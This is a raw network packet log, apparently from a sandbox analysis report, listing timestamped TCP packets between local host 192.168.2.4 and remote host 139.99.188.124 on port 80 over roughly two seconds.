                                                          Dec 18, 2024 09:32:39.284600973 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.292843103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.292885065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.292943954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.404071093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.404150009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.404247999 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.407094955 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.427057981 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.427099943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.427115917 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.429877996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.429924011 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.430053949 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.435337067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.435380936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.435389996 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.440869093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.440916061 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.440949917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.446388006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.446441889 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.446530104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.451948881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.451961994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.452002048 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.457520962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.457568884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.457570076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.463097095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.463146925 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.463231087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.468570948 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.468621016 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.468806982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.474611044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.474658012 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.474661112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.479614019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.479669094 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.479758024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.485102892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.485157013 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.485224009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.490982056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.490993977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.491050005 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.496155024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.496206045 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.496270895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.501676083 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.501719952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.501787901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.507234097 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.507332087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.507390022 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.512748957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.512800932 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.512868881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.518311024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.518366098 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.518408060 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.562928915 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.595541954 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.595578909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.595638037 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.597934008 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.598202944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.598257065 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.641127110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.641267061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.641330957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.643205881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.643368959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.643418074 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.647396088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.647433996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.647488117 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.651727915 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.651810884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.651875019 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.655755043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.655869961 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.655920029 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.660058975 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.660115004 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.660171986 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.664026976 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.664130926 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.664186001 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.668236971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.668355942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.668410063 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.672475100 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.672616005 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.672667027 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.676559925 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.676673889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.676726103 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.680720091 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.680845022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.680892944 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.684914112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.685019016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.685076952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.689210892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.689373970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.689419985 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.693249941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.693370104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.693428993 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.697696924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.697877884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.697932005 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.701678991 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.701792002 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.701859951 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.705738068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.705863953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.705915928 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.710088015 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.710243940 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.710288048 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.714570999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.714718103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.714780092 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.718274117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.718341112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.718391895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.722410917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.722554922 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.722606897 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.726604939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.726717949 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.726762056 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.730792999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.730895996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.730945110 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.734868050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.734988928 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.735038996 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.739012957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.739120960 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.739177942 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.743110895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.743294954 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.743349075 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.747240067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.747370958 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.747437000 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.751409054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.751625061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.751671076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.755502939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.755583048 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.755630016 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.759628057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.759748936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.759789944 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.763816118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.763855934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.763931036 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.856265068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.856369019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.856620073 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.856826067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.856952906 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.857008934 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.858829021 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.858963966 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.859015942 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.860855103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.860961914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.861013889 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.862812042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.862889051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.862935066 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.864811897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.864900112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.864948988 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.866856098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.866898060 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.866947889 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.868778944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.868941069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.868997097 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.870726109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.870879889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.870930910 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.872680902 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.872802973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.872850895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.874888897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.875065088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.875129938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.876571894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.876727104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.876774073 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.878494978 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.878628016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.878676891 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.880549908 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.880701065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.880749941 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.882297993 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.882420063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.882466078 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.884413004 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.884569883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.884618998 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.886301994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.886429071 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.886481047 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.887949944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.888092041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.888133049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.890351057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.890490055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.890537024 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.891740084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.891872883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.891920090 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.893647909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.893805027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.893861055 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.895689964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.895747900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.895823956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.897567034 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.897622108 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.897670984 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.899367094 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.899544954 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.899595022 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.901196957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.901326895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.901376009 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.903090000 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.903204918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.903251886 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.904835939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.904979944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.905030012 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.906807899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.906950951 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.907007933 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.908612013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.908732891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.908787012 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.910474062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.910660982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.910712957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.914108992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.914146900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.914222956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.914259911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.914381027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.914432049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.916141987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.916282892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.916335106 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.917973995 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.918239117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.918284893 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.919791937 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.919848919 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.919895887 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.922003984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.922059059 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.922107935 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.923747063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.923825979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.923873901 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.925625086 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.925853968 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.925913095 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.927416086 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.927615881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.927670956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.929178953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.929276943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.929327011 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.931029081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.931130886 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.931180000 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.932898998 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.933032990 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.933079958 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.934776068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.934920073 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.934967995 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.936630011 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.936805010 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.936850071 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.938508987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.938632965 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.938680887 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.940422058 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.940479040 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.940525055 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.942306042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.942430019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.942476034 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.944297075 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.944421053 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.944468975 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.946095943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.946249962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.946295977 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.948040962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.948076963 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.948124886 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.047338009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.071283102 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.071342945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.071361065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.071794987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.071849108 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.071896076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.073023081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.073067904 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.073133945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.074582100 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.074626923 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.074711084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.075599909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.075656891 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.075738907 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.076941967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.076996088 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.077012062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.078212976 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.078259945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.078337908 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.079476118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.079528093 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.079611063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.080837965 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.080897093 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.080936909 CET8049731139.99.188.124192.168.2.4
